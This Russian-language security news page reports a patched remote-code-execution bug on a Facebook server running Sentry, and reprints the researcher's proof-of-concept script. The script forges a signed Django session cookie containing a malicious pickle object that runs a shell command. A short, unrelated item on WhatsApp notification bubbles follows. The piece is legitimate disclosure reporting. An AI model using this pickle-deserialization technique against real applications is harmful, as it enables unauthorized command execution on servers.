Баг на сервере Facebook позволял удаленно запустить вредоносный код

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Разработчики Facebook исправили серьезный баг, который мог привести к удаленному выполнению кода. Сама уязвимость была обнаружена на одном из серверов интернет-гиганта, о чем сообщил исследователь безопасности Дэниел Ле Галл, также известный под псевдонимом «Blaklis».

Ле Галл, работающий в SCRT Information Security, в пятницу заявил, что ему выплатили $5000 за сообщение о проблеме безопасности.

Суть уязвимости в том, что злоумышленник может выполнить произвольные команды, используя вредоносные файлы cookie.

Несмотря на то, что подобные бреши обычно довольно опасны, эксперт подчеркнул, что с помощью этого бага нельзя было получить пользовательские данные. Разработчики устранили уязвимость в этом месяце, еще до того, как была опубликована информация о ее наличии.

«Blaklis» утверждает, что недостаток был найден на одном из серверов Facebook, где было запущено программное обеспечение для сбора логов Sentry.

«Само приложение было крайне нестабильным, особенно в отношении функции сброса пароля пользователя», — объясняет специалист.

В итоге Ле Галлу удалось найти в логах детали обработки cookie, а также подробности использования приложением протокола Pickle, который может быть уязвим для различного рода манипуляций. Используя все вышеозначенные данные, эксперт мог обработать файлы cookie, которые могли запускать команды на машине.

Исследователь опубликовал PoC-код, который является небольшим файлом cookie:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

WhatsApp на Android станет удобнее для многозадачности благодаря пузырькам

WhatsApp работает над новой функцией для Android — пузырьками уведомлений. Они позволят открывать переписки в небольшом плавающем окне поверх других приложений, не заходя в сам мессенджер.

Идея простая: приходит сообщение — на экране появляется круглый значок с аватаром контакта или группы и маленькой иконкой WhatsApp.

Нажал на него — открыл компактное окно чата, прочитал сообщение и сразу ответил. При этом можно не выходить из приложения, в котором пользователь сидел до этого: например, из браузера, видео, игры или соцсети.

Функция, по данным WABetaInfo, должна сделать общение быстрее и удобнее, особенно в режиме многозадачности. Не нужно постоянно переключаться между WhatsApp и другими приложениями, а важный диалог при этом остаётся под рукой.

 

Пузырьки уведомлений поддерживаются Android начиная с версии 10, однако более стабильно и полноценно они работают на Android 11 и новее. Поэтому не исключено, что WhatsApp ограничит доступность функции более свежими версиями системы.

Кроме того, работа пузырьков будет зависеть от настроек самого устройства: пользователю может понадобиться отдельно разрешить приложениям показывать такие уведомления.

Сейчас нововведение находится в разработке и пока недоступно даже бета-тестерам. После завершения тестирования WhatsApp, вероятно, начнёт постепенно включать пузырьки уведомлений для отдельных пользователей бета-версии Android.

RSS: Новости на портале Anti-Malware.ru